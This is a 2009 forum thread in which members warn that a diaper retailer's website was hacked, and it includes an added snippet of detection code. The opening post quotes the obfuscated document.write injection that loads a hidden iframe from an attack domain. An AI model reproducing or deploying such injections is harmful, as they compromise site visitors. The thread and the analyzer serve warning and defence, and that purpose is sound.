Dry247.com compromised

Status
Not open for further replies.

bgi39jsjw0ggg

Est. Contributor
Messages
980
Role
  1. Diaper Lover
Just a quick FYI to everyone - dry247.com, makers & sellers of my favorite diaper, seems to have been hacked. Site still functions, but stopbadware.org has found that the site has embedded malicious code.

Things like:

Code:
document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');

That's a quick snippet from their page source. It's an embedded inline frame 1 pixel wide by 2 pixels high that loads up a Chinese attack site (there's a couple other sites it embeds, but I didn't feel like posting them), so avoid them. I haven't done any more poking around than just looking at their page source (haven't even checked on what it's downloading from microsotf.cn - no, that's not a typo), but it's possible that their server is infected and intercepting credit card data as well.

I'll be checking on this every so often, but you can see updated results from stopbadware.org yourself here: Stopbadware.org - Report for www.dry247.com

Do not - repeat, DO NOT - visit dry247.com for any reason. If you absolutely have to, please use Firefox and the NoScript add-on and deny script permission to dry247.com until they fix this problem. That will protect your computer from being compromised as well. Under no circumstances should you buy from their website, since nothing you do can protect you from that if their transaction system is indeed compromised. If you are desperate and have to buy some, their contact info is (copy & pasted from their website):

[email protected]

1-888-dry-247-8
(1-888-379-2478)

Dry Care
1425 37th street
Suite 613
Brooklyn, NY, 11218

This makes me sad, since they make my favorite diaper and I was going to buy a case. I can wait a couple days while they clear this up, though.


**EDIT**
Thanks to Technologic:
Google Safe Browsing diagnostic page for www.dry247.com (a link to the Google diagnostic page for Dry24/7's page. I should have posted this in the first place; thanks for catching it, Technologic.)

I've sent an email to them just to make sure they know.

**EDIT, Jul 28th 2009**

Their site is still down, no update as of yet as to when it will be back up. Why is it that so few companies ever consider security or disaster recovery until it's too late?
 
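An added example, not part of the original post: one way to review an injected `document.write` like the one quoted above without running it, by folding the split string literals back together statically and flagging tiny or hidden iframes. The function names, the `SAMPLE` input and the placeholder host are constructed for illustration.

```javascript
// Added example: statically fold string-literal concatenation; nothing is eval'd.
// Function names, SAMPLE and the placeholder host are constructed for illustration.
function foldStringConcat(expr) {
  let out = '';
  let i = 0;
  while (i < expr.length) {
    const ch = expr[i];
    if (ch === '"' || ch === "'") {
      i++; // skip opening quote
      while (i < expr.length && expr[i] !== ch) {
        if (expr[i] === '\\' && i + 1 < expr.length) i++; // take escaped char literally
        out += expr[i++];
      }
      i++; // skip closing quote
    } else if (ch === '+' || /\s/.test(ch)) {
      i++; // concatenation operator or whitespace between literals
    } else {
      return null; // variables or calls involved: refuse to guess
    }
  }
  return out;
}

// Report iframes written via document.write() that are tiny (<= 2px) or hidden.
// The regex stops at the first ");", which is enough for one-line injections.
function findHiddenIframes(source) {
  const findings = [];
  for (const call of source.matchAll(/document\.write(?:ln)?\s*\(([\s\S]*?)\)\s*;/g)) {
    const html = foldStringConcat(call[1]);
    if (html === null) continue;
    for (const tag of html.matchAll(/<iframe\b([^>]*)>/gi)) {
      const attr = (name) => {
        const m = new RegExp('\\b' + name + '\\s*=\\s*["\']?([^"\'\\s>]+)', 'i').exec(tag[1]);
        return m ? m[1] : null;
      };
      const width = parseInt(attr('width'), 10);
      const height = parseInt(attr('height'), 10);
      const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag[1]);
      if (width <= 2 || height <= 2 || hidden) {
        findings.push({ src: attr('src'), width, height, html });
      }
    }
  }
  return findings;
}

// Constructed sample in the same obfuscation style, pointing at a placeholder host.
const SAMPLE = String.raw`
document.write("<if"+''+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:/"+'/placeholder.example.invalid/'+"\" wid"+'th=1 he'+"igh"+'t'+"=2></i"+"fra"+'me>');
document.write("<p>ordinary content</p>");
`;
console.log(findHiddenIframes(SAMPLE));
```

The `html` field of each finding holds the reassembled markup, so the frame's real target can be read from saved page source instead of from a live browser session.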
Messages
338
Role
  1. Diaper Lover
  2. Sissy
  3. Incontinent
OMG!!! I need some... I am running low here soon. You think if they know about this... they would put up under construction or something. Yikes!!!


EDIT PART:

Thank you so much for bringing this to our attention.
 

Technologic

Est. Contributor
Messages
160
Role
  1. Adult Baby
  2. Diaper Lover
Just for the hell of it I visited the site just to see what happens. But first of all I am on a VM so if anything happened I just delete the VM, no big deal. I used Chrome to get to it and of course it picked up on the fact that the site was infected. It gave me the option to see a Google diagnostic of the page. If you are interested, The Diagnostic Page
Just if anyone wanted to see that. It's about the site that tries to load up after you visit the Dry24/7 website.
 

Entity

Est. Contributor
Messages
1,232
Role
  1. Diaper Lover
  2. Private
If you still want to use the site, install the Firefox NoScript extension. It won't allow any scripts like that to get through without your knowledge. But more to the point, it is good that you people caught wind of a threat before it could do any real damage.
 

bgi39jsjw0ggg

Est. Contributor
Messages
980
Role
  1. Diaper Lover
Got a response from the Dry24/7 people today. They are aware of the problem now and they are working on a fix. They aren't sure how long it will take (a couple days?), and they say there is a possibility that they'll shut down the site for the time being.
 

Darkfinn

Banned
Messages
3,676
Role
  1. Diaper Lover
  2. Incontinent
This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.
 

Technologic

Est. Contributor
Messages
160
Role
  1. Adult Baby
  2. Diaper Lover
This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.

I don't think this is something they chose to do. I know they added popups but this is code that when you access their site it tries to force you onto a malicious website.
 

bgi39jsjw0ggg

Est. Contributor
Messages
980
Role
  1. Diaper Lover
This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.

Yeah, this isn't just popups. The JavaScript obfuscation clearly embeds hidden frames that open up known-malicious web pages, and the Dry 24/7 people themselves told me that they're investigating the problem. They describe their site as "victimized" and are trying to repair the problem.
 

chevre

Est. Contributor
Messages
1,434
Role
  1. Diaper Lover
I think before there was an issue with the site being misclassified by Avast! as malicious, but that was solved a while ago. This is something new and nasty. Thanks for pointing it out!
 

audio file

Est. Contributor
Messages
203
Role
  1. Adult Baby
  2. Diaper Lover
  3. Little
Norton antivirus has given an equally bad report on the site.
 

Mauiman

Est. Contributor
Messages
625
Role
  1. Incontinent
All I can say is that it is very disgusting that people actually do this sort of thing. They did it to a site that I go to a great number of times as well. And to think I was going to go and check them out for some new diapers or at least to try out a new kind of thick, comfy and absorbent diaper as well.
 

Darkfinn

Banned
Messages
3,676
Role
  1. Diaper Lover
  2. Incontinent
Well, they have taken the site down... at least until it is fixed... I wonder how many sales they will lose.
 

Somore

Contributor
Messages
18
Role
  1. Diaper Lover
I did call and order another box from DRY247. The price has gone up to $99 from $75.
 

chevre

Est. Contributor
Messages
1,434
Role
  1. Diaper Lover
I did call and order another box from DRY247. The price has gone up to $99 from $75.

That actually happened a while ago when the "overstock" sale ended. They're still worth it, but damn that was a good deal.
 

babysage

Est. Contributor
Messages
90
Role
  1. Diaper Lover
Well it figures that a site that would be visited by older adults would likely get hit. Before it got caught who knows what all got jacked from visitors.
 

chevre

Est. Contributor
Messages
1,434
Role
  1. Diaper Lover
I sort of doubt they specifically targeted the site. More likely it was either a worm, or they just scanned random websites looking for a vulnerability and that one happened to come up.
 

Slycamer

Est. Contributor
Messages
499
Role
  1. Diaper Lover
  2. Babyfur
Just so you know, I am reporting this to their customer service. I kept their email.
 

chevre

Est. Contributor
Messages
1,434
Role
  1. Diaper Lover
Just so you know, I am reporting this to their customer service. I kept their email.

Perhaps you should check their site (or the rest of this thread :p) first. They've already posted that they're aware of being compromised and the site is offline.
 